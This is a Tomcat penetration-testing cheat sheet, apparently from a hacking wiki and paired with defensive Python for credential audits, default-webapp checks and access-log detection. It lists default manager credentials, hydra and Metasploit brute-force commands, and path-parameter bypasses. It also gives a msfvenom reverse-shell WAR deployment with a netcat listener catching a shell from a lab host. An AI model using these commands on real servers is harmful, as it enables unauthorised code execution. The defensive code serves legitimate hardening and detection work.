# Tomcat

### Find Version

```bash
curl -s http://tomcat-site.local:8080/docs/ | grep Tomcat 

<html lang="en"><head><META http-equiv="Content-Type" content="text/html; charset=UTF-8"><link href="./images/docs-stylesheet.css" rel="stylesheet" type="text/css"><title>Apache Tomcat 9 (9.0.30) - Documentation Index</title><meta name="author"
```
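The `/docs/` index discloses the exact build in its `<title>`. As an added example (not code from the original page), a small parser that pulls the version out of that page so a fingerprint check can be scripted and fails cleanly when the documentation webapp has been removed; the sample HTML below is constructed from the curl output above.

```python
import re
from typing import Optional

# Constructed sample: the start of Tomcat's bundled /docs/ index page,
# trimmed to the part that matters (not a real capture).
SAMPLE_DOCS_HTML = (
    '<html lang="en"><head><META http-equiv="Content-Type" '
    'content="text/html; charset=UTF-8">'
    '<title>Apache Tomcat 9 (9.0.30) - Documentation Index</title></head>'
)

# Title format used by the docs webapp: "Apache Tomcat <major> (<full version>) - ..."
_TITLE_RE = re.compile(
    r"<title>\s*Apache Tomcat\s+(?P<major>\d+)\s*\((?P<full>[\w.\-]+)\)",
    re.IGNORECASE,
)


def tomcat_version_from_docs(html: str) -> Optional[dict]:
    """Return {'major': '9', 'version': '9.0.30'} parsed from the /docs/ index,
    or None when the response does not look like Tomcat's bundled docs
    (e.g. the webapp was removed, which is the recommended hardening)."""
    m = _TITLE_RE.search(html)
    if not m:
        return None
    return {"major": m.group("major"), "version": m.group("full")}


if __name__ == "__main__":
    print(tomcat_version_from_docs(SAMPLE_DOCS_HTML))
    print(tomcat_version_from_docs("<title>404 Not Found</title>"))
```

Feed it the body of `curl -s http://host:8080/docs/`; a `None` result on a production host is the state you want, since the docs webapp has no business being deployed there.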

### Default credentials

The most interesting path in Tomcat is ***/manager/html***: through that **path you can upload and deploy WAR files** (execute code). The path is protected by HTTP basic auth, and the most common credentials are:

```
admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
```
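The same list can be turned into a check on the server side. Below is an added example (not from the original page) that audits a `conf/tomcat-users.xml` for the default credential pairs above and for empty passwords, and marks which of the offending accounts hold a manager or admin role. The XML is a constructed sample, and the role list is the set of manager/host-manager roles Tomcat defines.

```python
import xml.etree.ElementTree as ET

# The credential pairs listed above as (username, password); the empty
# string stands for the "<NOTHING>" entry.
DEFAULT_CREDENTIALS = {
    ("admin", "admin"), ("tomcat", "tomcat"), ("admin", ""),
    ("admin", "s3cr3t"), ("tomcat", "s3cr3t"), ("admin", "tomcat"),
}

# Roles that grant access to the manager or host-manager applications.
PRIVILEGED_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status",
    "admin-gui", "admin-script",
}

# Constructed sample conf/tomcat-users.xml (not taken from a real install).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cr3t" roles="manager-gui,manager-script"/>
  <user username="admin" password="" roles="manager-gui"/>
  <user username="guest" password="" roles=""/>
  <user username="deployer" password="Vq7#pL2m!xR9wT4z" roles="manager-script"/>
</tomcat-users>
"""


def _local_name(tag: str) -> str:
    """Strip a namespace prefix such as '{http://tomcat.apache.org/xml}'."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text: str) -> list:
    """Return one finding per <user> whose credentials are in the default list
    or whose password is empty. 'privileged' is True when the account holds a
    manager/admin role, i.e. when the weak password also means code execution."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root.iter():
        if _local_name(el.tag) != "user":
            continue
        username = el.get("username") or el.get("name") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        privileged = bool(roles & PRIVILEGED_ROLES)
        if (username, password) in DEFAULT_CREDENTIALS:
            issue = "default-credential"
        elif password == "":
            issue = "empty-password"
        else:
            continue
        findings.append({"username": username, "issue": issue, "privileged": privileged})
    return findings


if __name__ == "__main__":
    for finding in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(finding)
```

One caveat: if the realm is configured with a `CredentialHandler`, the `password` attribute holds a digest rather than plaintext, and the plaintext comparison above no longer applies to those entries.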

#### Brute force login

```
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.64 http-get /manager/html

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set VHOST tomcat-site.internal
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set stop_on_success true
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set rhosts <IP>
```

### /examples

The following example scripts ship with Apache Tomcat v4.x - v7.x and can be used by attackers to gain information about the system. These scripts are also known to be vulnerable to cross-site scripting (XSS) (from [here](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/)).

```
/examples/jsp/num/numguess.jsp
/examples/jsp/dates/date.jsp
/examples/jsp/snp/snoop.jsp
/examples/jsp/error/error.html
/examples/jsp/sessions/carts.html
/examples/jsp/checkbox/check.html
/examples/jsp/colors/colors.html
/examples/jsp/cal/login.html
/examples/jsp/include/include.jsp
/examples/jsp/forward/forward.jsp
/examples/jsp/plugin/plugin.jsp
/examples/jsp/jsptoserv/jsptoservlet.jsp
/examples/jsp/simpletag/foo.jsp
/examples/jsp/mail/sendmail.jsp
/examples/servlet/HelloWorldExample
/examples/servlet/RequestInfoExample
/examples/servlet/RequestHeaderExample
/examples/servlet/RequestParamExample
/examples/servlet/CookieExample
/examples/servlet/JndiServlet
/examples/servlet/SessionExample
/tomcat-docs/appdev/sample/web/hello.jsp
```
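The quickest way to find out whether these default webapps are still deployed is the manager's own `/manager/text/list` output (one `path:state:sessions:docBase` line per context, as in the deployment transcript further down this page). As an added example, not code from the original page, a parser for that format that flags the stock webapps which should not exist on a production instance; the listing below is a constructed sample.

```python
# Constructed sample of /manager/text/list output (not a real capture).
SAMPLE_LIST_OUTPUT = """OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:0:/usr/share/tomcat9-admin/host-manager
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs
"""

# Webapps bundled with Tomcat that a hardened instance should not serve.
DEFAULT_WEBAPPS = {
    "/examples": "sample JSPs/servlets (information leak, XSS)",
    "/docs": "bundled documentation (discloses the exact version)",
    "/host-manager": "virtual-host management UI",
}


def parse_manager_list(text: str) -> list:
    """Parse 'path:state:sessions:docBase' lines into dicts, skipping the
    status line and anything that does not fit the format."""
    apps = []
    for line in text.splitlines():
        if not line.startswith("/"):
            continue
        parts = line.split(":", 3)  # docBase may itself contain ':' on Windows
        if len(parts) != 4:
            continue
        path, state, sessions, docbase = parts
        apps.append({
            "path": path,
            "state": state,
            "sessions": int(sessions) if sessions.isdigit() else -1,
            "docbase": docbase,
        })
    return apps


def flag_default_webapps(apps: list) -> list:
    """Return (context path, reason) for every default webapp still running."""
    return [
        (a["path"], DEFAULT_WEBAPPS[a["path"]])
        for a in apps
        if a["path"] in DEFAULT_WEBAPPS and a["state"] == "running"
    ]


if __name__ == "__main__":
    for path, reason in flag_default_webapps(parse_manager_list(SAMPLE_LIST_OUTPUT)):
        print(f"{path}: {reason}")
```

The fix on the defending side is simply to delete `webapps/examples`, `webapps/docs` and, unless virtual hosts are managed remotely, `webapps/host-manager`, then re-run the listing to confirm.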

### Path Traversal (..;/)

In some **vulnerable configurations of Tomcat** you can gain access to protected directories in Tomcat using the path: `/..;/`

So, for example, you might be able to **access the Tomcat manager** page by accessing: `www.vulnerable.com/lalala/..;/manager/html`

**Another way** to bypass protected paths using this trick is to access `http://www.vulnerable.com/;param=value/manager/html`
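Why this works, and how to check for it: a servlet container strips `;name=value` path parameters from every segment before it normalizes and maps the path, so `/lalala/..;/manager/html` and `/;param=value/manager/html` both end up at `/manager/html` inside Tomcat. A reverse proxy or WAF that applies its deny rule to the raw path never sees `/manager` and lets the request through. The following is an added example, not code from the original page or from Tomcat itself: a small model of the two normalizations, a hypothetical `/manager` deny rule written the naive way and the hardened way, and both payloads from the text run through each.

```python
# Model of the path handling involved. Tomcat's real implementation lives in
# its request-mapping code; this reproduces only the two behaviours that
# matter here: path-parameter stripping and dot-segment normalization.


def strip_path_parameters(path: str) -> str:
    """Drop ';...' from every segment, as a servlet container does before
    mapping: '/a/..;/b' -> '/a/../b', '/;x=1/b' -> '//b'."""
    return "/".join(seg.split(";", 1)[0] for seg in path.split("/"))


def normalize(path: str) -> str:
    """Collapse empty and '.' segments and resolve '..' without escaping
    the root. Note that '..;' is NOT '..' here, which is the whole trick."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


# Hypothetical deny rule at a front-end proxy: nothing under /manager may pass.
def naive_proxy_allows(path: str) -> bool:
    """Normalizes only dot segments; path parameters are left in place."""
    return not normalize(path).startswith("/manager")


def hardened_proxy_allows(path: str) -> bool:
    """Strips path parameters first, so the rule sees what Tomcat will see."""
    return not normalize(strip_path_parameters(path)).startswith("/manager")


def tomcat_maps_to(path: str) -> str:
    """The context/servlet path Tomcat will actually dispatch to."""
    return normalize(strip_path_parameters(path))


if __name__ == "__main__":
    for p in ["/manager/html", "/lalala/..;/manager/html", "/;param=value/manager/html"]:
        print(f"{p:32} naive={naive_proxy_allows(p)!s:5} "
              f"hardened={hardened_proxy_allows(p)!s:5} tomcat->{tomcat_maps_to(p)}")
```

A stricter alternative to `hardened_proxy_allows` is to reject any request path containing `;` at the proxy, since legitimate applications rarely rely on path parameters; either way the rule has to be evaluated on the path Tomcat will see, not on the raw bytes.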

### RCE through .WAR

Finally, if you have access to the Tomcat Web Application Manager, you can **upload and deploy a .war file (execute code)**.

```bash
## Create payload
$ msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.44 lport=4488 -f war > rev-shell.war

## Upload payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' -T rev-shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/rev-shell'
OK - Deployed application at context path [/rev-shell]

## List deployed payload
$ curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/manager/text/list
OK - Listed applications for virtual host [localhost]
/:running:0:ROOT
/examples:running:0:/usr/share/tomcat9-examples/examples
/host-manager:running:0:/usr/share/tomcat9-admin/host-manager
/rev-shell:running:0:rev-shell
/manager:running:0:/usr/share/tomcat9-admin/manager
/docs:running:0:/usr/share/tomcat9-docs/docs

## Execute deployed payload
root@nidus:/git/htb/tabby# curl -u 'tomcat':'$3cureP4s5w0rd123!' http://10.10.10.194:8080/rev-shell/

## Capture incoming shell
root@nidus:/usr/share/tomcat9# nc -lvnp 4488
listening on [any] 4488 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.194] 45912
whoami
tomcat
```
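Both the brute-force login attempts from the earlier section and the deployment above leave a clear trail in Tomcat's access log (`AccessLogValve`, default "common" pattern `%h %l %u %t "%r" %s %b`): a burst of 401s on `/manager/html` from one address, then a 200 on `/manager/text/deploy?path=...` by an authenticated user. As an added example, not code from the original page, the detection below parses a constructed access log in that format and reports both events, tying a deploy back to a preceding brute force from the same address. The thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log in Tomcat's "common" pattern (not a real
# capture): a credential-guessing burst, a successful login, a deploy via
# the text interface, the first request to the new context, and one
# unrelated failed login from another address.
SAMPLE_ACCESS_LOG = """\
10.10.14.44 - - [22/Jun/2020:14:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [22/Jun/2020:14:03:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [22/Jun/2020:14:03:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [22/Jun/2020:14:03:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [22/Jun/2020:14:03:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [22/Jun/2020:14:03:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - tomcat [22/Jun/2020:14:03:04 +0000] "GET /manager/html HTTP/1.1" 200 15478
10.10.14.44 - tomcat [22/Jun/2020:14:05:10 +0000] "PUT /manager/text/deploy?path=/rev-shell HTTP/1.1" 200 52
10.10.14.44 - - [22/Jun/2020:14:05:15 +0000] "GET /rev-shell/ HTTP/1.1" 200 0
192.0.2.10 - - [22/Jun/2020:14:07:00 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - admin [22/Jun/2020:14:07:05 +0000] "GET /manager/html HTTP/1.1" 200 15478
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy a webapp (text interface and HTML form upload).
DEPLOY_PATHS = ("/manager/text/deploy", "/manager/html/upload")


def parse_access_log(text: str) -> list:
    """Parse common-pattern lines; lines in another pattern are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["status"] = int(e["status"])
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        split = urlsplit(e["target"])
        e["path"], e["query"] = split.path, parse_qs(split.query)
        entries.append(e)
    return entries


def detect_manager_abuse(entries: list, threshold: int = 5, window_seconds: int = 60) -> list:
    """Flag an address once it produces `threshold` 401s under /manager inside
    `window_seconds`, and flag every successful deploy, noting whether the
    deploying address was flagged for guessing first."""
    findings = []
    recent_failures = defaultdict(deque)  # ip -> timestamps of recent 401s
    flagged = set()
    for e in entries:
        if not e["path"].startswith("/manager"):
            continue
        if e["status"] == 401:
            q = recent_failures[e["ip"]]
            q.append(e["ts"])
            while q and (e["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and e["ip"] not in flagged:
                flagged.add(e["ip"])
                findings.append({"type": "manager-bruteforce", "ip": e["ip"], "failures": len(q)})
        elif e["status"] == 200 and e["path"].startswith(DEPLOY_PATHS):
            findings.append({
                "type": "manager-deploy",
                "ip": e["ip"],
                "user": e["user"],
                "context": e["query"].get("path", [None])[0],  # None for form uploads
                "after_bruteforce": e["ip"] in flagged,
            })
    return findings


if __name__ == "__main__":
    for finding in detect_manager_abuse(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(finding)
```

A deploy from an address that was just flagged for guessing is the combination worth paging on; a deploy on its own is only notable outside the addresses and accounts your deployment pipeline normally uses.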

